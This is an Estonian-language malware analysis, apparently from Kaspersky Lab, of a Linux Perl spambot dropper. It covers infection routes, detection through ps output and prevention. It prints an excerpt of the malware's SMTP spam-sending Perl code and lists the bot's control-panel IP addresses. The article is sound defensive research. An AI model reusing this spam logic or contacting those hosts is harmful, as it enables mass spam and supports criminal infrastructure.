Arvestades paljude linux´i-kasutajate reaktsiooni meie eelmise artikli kohta, oleks loogiline mainitud näidet põhjalikumalt uurida, seda enam, et hiljuti saabus Kaspersky Lab´i Trojan-Dropper.Linux.Prl uus modifikatsioon.

Trojan-Dropper.Linux.Prl.b

Faili nimetus: ob.pl. Faili tüüp: ELF. Avastas kasutaja oma serveris pärast eelmise artikli avaldamist. Tööpõhimõte on sama - "/usr/bin/perl" protsessi loomine ja sellele pipe´i kaudu Perl-skripti edastamine.

Skripti ennast säilitatakse troojalase kehas šifreeritult. Dešifreeringu algoritm näeb seejuures välja selline:



Dešifreeritud Perl-skripti põhiülesanne on rämpsposti laialisaatmine.

Kirjade saatmise eest vastutav Perl-skripti osa:

if ($session->{$handle}{status} eq "mx_rd")

{

        $session->{$handle}{buffer} = "HELO $buffers->{helo}x0Dx0A";

        $session->{$handle}{status} = "mx_gr";

}

elsif ($session->{$handle}{status} eq "mx_gr")

{

        my ($mail) = &mail($session->{$handle}{sender}); 

        $session->{$handle}{buffer} = "MAIL FROM: <$$mail>x0Dx0A";

        $session->{$handle}{status} = "mx_mf";

}

elsif ($session->{$handle}{status} eq "mx_mf")

{

        my ($mail) = &mail($session->{$handle}{object}); 

        $session->{$handle}{buffer} = "RCPT TO: <$$mail>x0Dx0A";

        $session->{$handle}{status} = "mx_rt";

}

elsif ($session->{$handle}{status} eq "mx_rt")

{

        $session->{$handle}{buffer} = "DATAx0Dx0A";

        $session->{$handle}{status} = "mx_dt";

}

elsif ($session->{$handle}{status} eq "mx_dt")

{

        $session->{$handle}{buffer} = &data($session->{$handle}{object}, $session->{$handle}{sender});

        $session->{$handle}{buffer} .= "x0Dx0A.x0Dx0A";

        $session->{$handle}{status} = "mx_dr";

}

elsif ($session->{$handle}{status} eq "mx_dr")

{

        $buffers->{good}[0] ++;

        $buffers->{good}[1] .= "$session->{$handle}{object}x0A" if $buffers->{level}; 

        $session->{$handle}{object} = ""; 

        $session->{$handle}{buffer} = "QUITx0Dx0A";

        $session->{$handle}{status} = "mx_qt";

Bot´is on seejuures märgitud tema töö jaoks vajalike halduspaneelidega IP-aadressid: 195.144.21.122, 195.144.21.124 ja 194.54.83.114.

Kust nad pärit on?

Lugenud läbi mitu selleteemalist foorumiteemat ja võtnud ühendust mitme nakatatud serveri halduriga, õnnestus teada saada, et need spambot´id ilmusid serveritesse kolmel viisil:

1. FTP-serveri parooli vargusel kahjurprogrammide abil
2. FTP- ja SSH-serverite parooli valikul sõnastiku abil
3. Sissetungimisel phpbb kaudu

Spambot´i laadimisega muutusid alati HTML-failid, millele lisati nakatatud veebilehtede iframe´id.

Avastamine, eemaldamine, korduvnakatumise vältimine

Üldjuhul on spambot´i tööd lihtne avastada käsuga ps -aux. Seejuures võib esile tõsta sellele bot´ile iseloomulikku kolme nakatumistunnust, mis sõltuvad sellest, kuidas pahategijad on bot´i süsteemi paigaldanud:

1. Perl-interpreteerija käivitati –w parameetrite ja teega mainitud spambot´i sisaldava faili juurde (iseloomulik phpbb kaudu sissetungimisele)
2. Perl -w parameetri ja teega serveris puuduva faili juurde (iseloomulik troojaprogrammide abil FTP-serveri parooli vargusele)
3. Dropper´i abil parameetriteta käivitatud Perl (iseloomulik parooli valimisel)

Kõigest ülalöeldust võib teha lihtsad järeldused selle spambot´iga masinate nakatumise vältimiseks:

1. Kasutada keerulisi paroole
2. Kasutada serverisse paigaldatud toodete viimaseid versioone
3. Jälgida kõikide veebilehtedele juurdepääsuks kasutatavate arvutite turvalisust